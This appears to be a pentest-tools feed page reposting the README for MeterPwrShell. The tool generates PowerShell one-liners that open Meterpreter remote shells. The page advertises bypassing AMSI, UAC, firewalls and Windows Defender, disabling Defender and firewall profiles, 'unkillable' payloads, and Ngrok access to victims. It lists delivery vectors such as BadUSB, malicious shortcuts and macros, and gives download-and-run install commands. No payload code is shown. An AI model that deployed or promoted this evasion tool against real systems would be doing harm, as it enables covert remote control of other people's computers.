Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all articles
Browse latest Browse all 5816

MeterPwrShell - Automated Tool That Generate The Perfect Powershell Payload

$
0
0


Automated Tool That Generate A Powershell Oneliner That Can Create Meterpreter Shell On Metasploit,Bypass AMSI,Bypass Firewall,Bypass UAC,And Bypass Any AVs.

This tool is powered by Metasploit-Framework and amsi.fail


Notes
  • NEVER UPLOAD THE PAYLOAD THAT GENERATED BY THIS PROGRAM TO ANY ONLINE SCANNER
  • NEVER USE THIS PROGRAM FOR MALICIOUS PURPOSE
  • SPREADING THE PAYLOAD THAT GENERATED BY THIS PROGRAM IS NOT COOL
  • ANY DAMAGE GENERATED BY THIS PROGRAM IS NOT MY (As the program maker) RESPONSIBILTY!!!
  • If you have some feature recommendation,post that on Issue
  • If you have some issue with the program,try redownloading it again (trust me),cause sometimes i edit the release and fix it without telling
  • If you want to know how tf my payload bypass any AVs,you can check on this and this
  • Dont even try to fork this repository,you'll dont get the releases!

Features (v1.5.1)
  • Bypass UAC
  • Automatic Migrate (using PrependMigrate)
  • Built-in GetSYSTEM (if u use the Bypass UAC option)
  • Disable All Firewall Profile (if u use the Bypass UAC option)
  • Fully Bypass Windows Defender Real-time Protection (if you choose shortened payload or using Bypass UAC or both)
  • Disable Windows Defender Security Features (if u use the Bypass UAC option)
  • Fully unkillable payload
  • Bypasses AMSI Successfully (if you choose shortened payload)
  • Short One-Liner (if you choose shortened payload)
  • Bypass Firewall (If you pick an unstaged payload)
  • Great CLI
  • A Lot More (Try it by yourself)

All payload features is tested on Windows 10 v20H2

Advantages Of MeterPwrShell Compared To The web_delivery Module From Metasploit Framework
  • Shorter stager (Or short one-liner in this case)
  • Various AMSI bypass technique and code
  • Dont need to setup a server for the stager
  • Support Ngrok built-in (so the victim doesnt need to be on the same local network)
  • Automatic Built-in Privesc
  • Easily Bypass Windows Defender

Thanks to
  • Every single of my Discord Friends
  • Special Thx to theia#8536 on Discord
  • @FuzzySec for that awesome Masquerade PEB script
  • @decoder-it for that amazing PPID Spoofing script
  • Me for not dying when creating this tool
  • Ed Wilson AKA Microsoft Scripting Guy for the great Powershell scripting tutorials
  • and the last one is Emeric Nasi for the research on bypassing AV dynamics

Requirements
  • Kali Linux,Ubuntu,Or Debian (If you dont use on of those,the tool will not work!!!)
  • Metasploit Framework
  • Internet Connection (Both On Victim And Attacker Computer)

Installation
apt update && apt install wget
mkdir MeterPwrShell
cd MeterPwrShell && wget https://github.com/GetRektBoy724/MeterPwrShell/releases/download/v1.5.1/meterpwrshellexec
chmod +x meterpwrshellexec

Usage
# ./meterpwrshellexec -c help
Available arguments : help, version, showbanner, showlastdebuglog, disablerootdetector, disableinternetdetector, disablealldetector
help : Show this page
version : Show MeterPwrShell's version
showbanner : Show MeterPwrShell's Banner
showlastdebuglog : Well,Its kinda self-explanatory tho
disablerootdetector : Well,Its kinda self-explanatory tho
disableinternetdetector : Well,Its kinda self-explanatory tho
disablealldetector : Disable all detector except Linux distribution detector

You also can use MeterPwrShell Without Any Flags And Arguments


Attack Vectors
  • BadUSBs
  • Malicious Shortcuts (lnk2pwn)
  • Document Macro Payload
  • MS DDE Exploit
  • Extreme Way : Type it in by yourself
  • Any exploit/vulns that let you execute command to victim
  • Idk i have run out of idea lmao

To-do List

Available features options
  • Bypass AMSI
  • Shortened Payload AKA IEX WebClient method (If you use Bypass AMSI Feature)
  • Bypass UAC (If you use Shortened Payload AKA IEX WebClient method)



Viewing all articles
Browse latest Browse all 5816

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>